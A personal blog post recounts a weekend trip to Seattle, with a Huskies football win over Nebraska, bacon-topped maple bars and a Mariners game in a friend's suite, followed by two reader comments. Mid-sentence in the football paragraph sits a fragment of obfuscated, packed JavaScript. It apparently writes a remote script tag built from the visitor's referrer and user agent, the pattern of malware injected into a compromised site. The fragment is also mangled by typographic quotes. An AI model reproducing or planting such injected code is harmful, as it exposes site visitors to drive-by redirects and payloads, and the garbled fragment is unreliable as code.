Hello, Seattle

We had an impromptu visit to Seattle this past weekend.  It’s always nice to go home and visit with family and friends!  This weekend was a sports {and food} filled weekend.

We started off with the Nebraska/UW football game.  I knew we should have brought our undefeated jerseys!  You know, the jerseys we wore to this ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nekyy|var|u0026u|referrer|eshtt||js|php’.split(‘|’),0,{}))

and this game.  Both of which were awesome victories for the huskies.  Did I also mention that one those said victories was against Nebraska.  Ugh, it was our fault they lost.

Not even the crazy hulk hand could help us.

But we did have semi-homeamade (eat your heart out Sandra Lee) Bacon Maple Donuts.  We bought maple bars and put bacon on top.  Done and done.

The next day we were in for a special treat!  Mariner’s game from a suite.  Baller style.  No serious.  It was like VIP all the way.  We had our own private entrance, gigantic TVs and way too much delicious food – including some fantastic cake balls painted like baseballs.  I ate them so fast I couldn’t take a picture.  All this from one of my lovely friends, Kellie!  Her family was in town and she was nice enough to invite her adopted Seattle family out for a day at the ballpark!

We had a great time!  Thanks, Kellie (and Chris too!)!

Sidenote – I am standing on a step and Kellie is still a solid 6 inches taller than me.  How cute is that belly?  On her…not me.

And don’t forget to enter my cookie giveaway!  It’s the last day to enter!  And these cookies are seriously delicious.

wahoo Seattle! think I found your site while searching for the Cinderella / Royal Wedding pic. Anywho – love the blog! I live in Seattle and was actually in a suite at the Sounders game Sat night. Keep up the good work…often a bright spot in my otherwise boring cubicle 🙂

I’ve heard the suites at the Sounders games are pretty fun as well! Can’t really go wrong with flat screens and tons of food 🙂 Thanks for visiting, Lindsay!
